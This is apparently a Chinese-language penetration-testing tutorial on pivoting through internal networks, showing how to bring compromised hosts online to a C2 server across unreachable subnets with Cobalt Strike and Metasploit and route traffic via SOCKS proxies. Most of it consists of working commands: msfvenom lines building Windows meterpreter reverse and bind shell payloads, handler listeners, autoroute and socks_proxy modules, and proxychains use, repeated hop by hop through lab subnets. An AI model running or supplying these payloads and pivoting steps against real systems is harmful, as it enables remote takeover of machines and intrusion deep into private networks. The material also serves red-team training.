内网对抗-代理通讯篇&不出网或不可达&SockS全协议&规则配置&C2正反向上线&解决方案

知识点

1、代理隧道篇-代理通讯网络不可达-正反向连接上线

2、代理隧道篇-代理通讯网络不可达-SockS代理配置

实现步骤

bash 复制代码
1、在被控机器上获取下一级网段
2、在被控及其上建立SockS节点
3、在工具上配置连接属性和规则触发

演示案例-代理技术-正反向监听/SockS配置-网络不可达-通讯解决/c2上线

bash 复制代码
解决:信息收集打点和漏洞利用部分
C2平台:MSF/CS/Sliver/Viper等


1、CS

192.168.139.x 网段反向上线




socks代理链接工具-Proxifier(windows)

bash 复制代码
注意:配置连接IP为C2服务器IP
C2服务器是一个远程服务器,‌用于管理和控制受感染的计算机或设备。‌C2服务器通常被用于网络攻击活动中,‌攻击者通过C2服务器发送命令,‌控制受感染的设备进行恶意行为




这里假设这个2.22的服务器存在漏洞能直接上线C2服务器,就会涉及一个C2正反向上线问题。

192.168.2.x 网段正向上线

bash 复制代码
反向监听器:reverse
正向监听器:bind(需主动连接)







192.168.3.x 网段正向上线






继续正向上线这个3.22服务器

192.168.4.x 网段正向上线

同理

2、MSF

192.168.139.x 网段反向上线

配置反向上线:

bash 复制代码
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.139.128 LPORT=3333 -f exe -o msf.exe

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3333
run

查看路由表

bash 复制代码
run post/multi/manage/autoroute
run autoroute -p

background 返回不结束会话

创建socks节点

bash 复制代码
use auxiliary/server/socks_proxy


socks代理链接工具-proxychains(linux)

加入修改配置:

bash 复制代码
/etc/proxychains4.conf


调用加载测试:

bash 复制代码
 proxychains4 curl http://192.168.2.22

192.168.2.x 网段正向上线

配置正向上线:

bash 复制代码
msfvenom -p windows/meterpreter/bind_tcp LPORT=xx -f exe -o msf.exe
use exploit/multi/handler

set payload windows/meterpreter/bind_tcp
set rhost xx.xx.xx.xx
set lport 6666
run



查看路由表:

bash 复制代码
run post/multi/manage/autoroute
run autoroute -p
background 

创建socks节点:

bash 复制代码
use auxiliary/server/socks_proxy


加入修改配置:

bash 复制代码
/etc/proxychains4.conf


192.168.3.x 网段正向上线

配置正向上线:

bash 复制代码
msfvenom -p windows/meterpreter/bind_tcp LPORT=xx -f exe -o msf.exe
use exploit/multi/handler

set payload windows/meterpreter/bind_tcp
set rhost xx.xx.xx.xx
set lport 6666
run


查看路由表:

bash 复制代码
run post/multi/manage/autoroute
run autoroute -p
background 

创建socks节点:

bash 复制代码
use auxiliary/server/socks_proxy


加入修改配置:

bash 复制代码
 /etc/proxychains4.conf


192.168.4.x 网段正向上线

配置正向上线:

bash 复制代码
msfvenom -p windows/meterpreter/bind_tcp LPORT=xx -f exe -o msf.exe
use exploit/multi/handler

set payload windows/meterpreter/bind_tcp
set rhost xx.xx.xx.xx
set lport 6666
run
相关推荐
Sufumaterials2 天前
安全合规背后的防腐挑战:HALAR ECTFE粉末涂料如何守护制药食品与环保设备
代理·世索科·苏福
Sufumaterials4 天前
告别设备腐蚀困扰:ECTFE粉末涂料如何破解锂电池正极材料生产中的防腐难题
代理·世索科·苏福
tang777894 天前
2026年国内代理IP服务商横向测评:企业级爬虫如何选型?
运维·服务器·网络·爬虫·python·代理
隔窗听雨眠6 天前
从DNS解析到分布式存储的技术解构
分布式·网关·cdn·dns·socks
ShoreKiten7 天前
THP-CSK靶场--内网横向移动(一)
渗透测试·内网
深念Y21 天前
从“改网页”到“改应用”:客户端数字显示伪造的技术原理与边界讨论
网络安全·dom·ps·代理·前端安全·开发者工具·内存修改器
flushmeteor1 个月前
java的动态代理和字节码生成技术
java·动态代理·代理·字节码生成
平凡的阳阳1 个月前
千里通Linux盒子搭建FRP全教程:低成本实现内网穿透+代理服务器
linux·frp·内网穿透·代理·socks5·远程ssh
bingyan03711 个月前
squid-基于rockylinux8配置内网代理访问阿里云软件源
阿里云·代理·squid·软件源
陈坤IA1 个月前
科技云盘 (CSTCloud) rclone WebDAV 连接配置文档
科技·代理·rclone·webdav·网盘